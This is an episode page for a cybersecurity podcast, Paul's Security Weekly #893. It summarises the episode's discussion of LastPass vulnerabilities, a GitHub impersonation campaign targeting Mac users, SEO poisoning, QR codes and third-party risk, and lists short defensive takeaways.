Paul's Security Weekly (Audio) Broadcom, LastPass, SEO Poisoning, QR codes, H1B visas, Distributed Computing... - PSW #893
Sep 25, 2025
Discover the latest in cybersecurity as the panel dives into Broadcom's strategies and LastPass vulnerabilities. They discuss the dangers of a GitHub impersonation campaign targeting Mac users. The importance of balancing user freedom with security is debated, alongside risks related to running unvetted scripts by developers. The dangers of QR codes and SEO poisoning are revealed, along with effective measures for managing third-party risk. Plus, find out how to protect your devices against theft and what to do if you lose your phone!
AI Snips
Chapters
Books
Transcript
Episode notes
Restrict Running Unvetted Shell Commands
- Block or restrict users from running unvetted shell/PowerShell scripts from the web, especially non-developers.
- Treat GitHub-supplied curl/wget install commands with skepticism and enforce review before execution.
Third Parties Create Hidden Highways
- Third-party integrations create deep, multi-hop access paths into your data and systems.
- The N-party problem (fourth/fifth parties) multiplies risk and hides who actually touches your data.
Invite Audits For Critical Vendors
- Require invited, auditable access (e.g., FedRAMP-style reviews) for critical third-party services.
- Insist on regular, signed disclosures or dashboards rather than trusting vendor questionnaires.
